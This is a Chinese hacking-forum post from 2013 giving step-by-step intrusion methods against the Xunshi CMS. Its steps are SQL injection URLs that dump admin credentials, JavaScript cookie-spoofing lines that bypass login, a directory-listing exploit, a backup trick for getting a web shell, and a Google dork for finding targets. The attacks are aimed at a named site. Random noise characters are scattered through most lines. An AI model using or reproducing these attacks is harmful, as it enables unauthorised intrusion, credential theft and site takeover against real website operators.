找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2861|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘: y( Y% t4 n. A& n4 C+ U

  }) k6 g3 Z/ v; o. k在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
" i' b& A. i# J$ H* c; O5 l' F  w8 {* v, s% X# e9 y/ b
以下本文总结来自黑防去年第9期杂志上的内容...
( x! F) u* M0 b2 k" O( v) T1 Y
% q% @: w4 C0 S- g2 p先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%5 \2 ^! [8 R2 }  z

! Q  a$ M' w9 G26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
5 ]; {4 W3 d" A% b8 Z; R9 P! \+ @! {' R) ]8 l
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况; k2 o9 u; G7 i! S% m
这里一个注入
# d0 j( b9 w: G- Y2 c" |  Y" x0 w
效果如图:
# _9 N# S, I4 u+ y8 A5 n
+ R0 s: ?+ D. P9 ]3 H" S / n8 y' z3 q9 g$ i: b* Z" D
0 |2 P8 \  l6 E$ ?7 [# s+ u6 x
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.9 S) U4 W5 y7 p) x
7 M! v9 C: B3 b  O" M% C: @5 L+ V
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去, |: r  ^( V1 Z7 }0 B# V
0 ]! Z' T* f$ O) ?: v) c
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
& ?# o0 Z( W8 n, t# {/ E
3 |  T  W- m' i, z$ f1 h6 n1 a& i* h那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
3 g2 C& |1 l; z! L
. J6 d$ z7 ]* E5 F. S$ X( S因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞' ~5 c3 F$ @) Y3 V
: D& g$ }# s  B# C, ?, x
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
8 U9 s2 c3 J* n/ G* N: W
, A8 K# P( K1 x+ M7 R4 O) N% D' O1 \访问这页面来列目录..步骤如下:
: w1 Y: v* t7 L/ B, R& S5 o0 O0 }% W& d
javascript:alert(document.cookie="admindj=1")
. y. i2 p% A) u# g. h6 |' m7 n9 }$ p* G8 w3 C4 b$ V: S. E
http://www.political-security.co ... asp?id=46&dir=../..
: x* q) L6 Z& D; E4 |& ^; l& z" q9 h" q! S9 ^$ |3 Z9 l0 |
效果如图:
% A8 h. |+ F/ x' o3 j9 z, {9 h8 N- M5 Z) J. X' q

1 Y, M3 b( C/ s" f8 D
- S, G8 `) x4 B$ I1 e! K( f$ e这样全站目录都能瞧了..找到后台目录..进去..- U' c! c: h) K4 O1 ~
6 M5 Z, I8 G! y3 c- B8 p
那么进了后台怎么拿shell??上传--备份就ok了..& [# Y2 l1 u! w, E) D
% j& Q6 p- ^8 h
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
& C1 V5 y: r$ G1 [' R5 y# K1 h, ?/ }3 i" \, G& Q+ d1 I; G
这个我也碰到过一次..你都可以通过列目录来实现..# b: m1 B5 ^3 k! f$ D. H
6 c. u& Q- M) @* z+ n( \
javascript:alert(document.cookie="admindj=1") 9 Z9 v0 Q8 g/ ]
4 |/ L' F6 s$ y; x5 @$ ~& v" }
http://www.political-security.co ... p?action=BackupData   d/ X' X# y' W5 d6 W& |

% X/ y7 e$ T' C- X5 m备份ok... q* T( \# t6 L
: C& c7 A- w7 V! h) d0 Y. _
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?' B/ @' ~: w) P% K
+ ^! C3 x' ?1 J# o) ]6 \
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下! U: u1 i# i3 D* q- r6 T

- g1 n: w7 Y# L; n6 a8 S( a然后访问此页面进行注入..步骤如下:
  X4 p" B: t, K$ h
3 {' s2 a- _8 F! t5 n( E$ Q$ ojavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
$ U5 k! @6 g. J7 X( Y3 Z. J' t; I9 Y# q
然后请求admin/admin_chk.asp页面, N; c3 y8 K: a* Z$ g9 g1 x

$ _2 p8 B' ^2 b/ _, k! c$ N, l9 h6 v输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
0 C: O, @% K5 {' T/ ^! l5 c* i2 |! k
) R0 n# _6 c- W1 m6 Q26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin  }9 m) H$ k, u, |9 k

% n6 Y" ?3 u: I. G, ^% q效果如图所示:3 F2 H9 h: ~; ~  Y: K3 h

2 f& u1 x. j% z- Y- \$ F
- E' X" a9 g) [! Q: k5 C; w4 ^1 ]; j  O3 b% T6 b! A" ^5 p
讯时漏洞2: e+ F# `# T* A, W% ^# U# n, C
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
6 ^1 c9 I1 u! b% ^$ @9 w
' ~' M0 ~3 p& J/ m& |1、/admin/admin_news_pl_view.asp?id=1
. M. w4 B6 r8 s( j' A//id任意 填入以下语句# @- P7 j8 M# Z+ A! J

5 N5 ]" K8 D( i- O/ W$ P2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
1 t+ g% D& M7 ~: ~+ t: T$ b
- d9 w  k) N& p( B6 V' P( }, A# e
# S. ^+ O1 `/ W9 s. Q1 d* s1 T- q) h5 f
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='6 [7 p- C9 Z: }1 {" s* b4 x0 G

% I+ p+ h4 i4 P6 s
* k! j# y/ i+ Y3 v- E# ^0 U1 }4 A! v& a$ S$ m
爆出管理员帐号和密码了* E$ o. y( ~+ v) N1 V9 ~1 t

$ i6 @' r9 H  h; O" \
; D6 i0 z8 U* W" ?
0 Y) k% n7 H! o- ~! l! `; s4、cookies进后台
8 O/ E' `5 z2 v; x! P+ w2 g * F3 K+ W* E6 y; H8 V
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
2 c; d2 t- \% A/ o4 \$ x
, `0 d, K  k6 ?" _3 x. R! l* H2 E" _7 K9 K+ {7 c8 h( @7 G
$ f* O1 W0 [7 b  K$ c+ a
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
( j* Z3 P3 s. d . Z# c1 o: k2 Q& m% z, ~

% H+ S, L. W9 @; Z  X; J7 K: O9 R1 l; c8 O+ T: z
6、后台有上传和备份取SHELL不难。2 d) @5 T4 _0 w! Z- L
! m9 R7 J  \4 O4 r
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
; {" `" t7 m% J, `3 u5 {# s
( U/ _+ H4 n: X% l$ h逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!6 m2 u# t) j$ O$ F

7 d. v% d6 I. y* N- H0 o$ b3 z8 L* \2 D6 z8 X% A
  w5 l) }# x$ j4 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表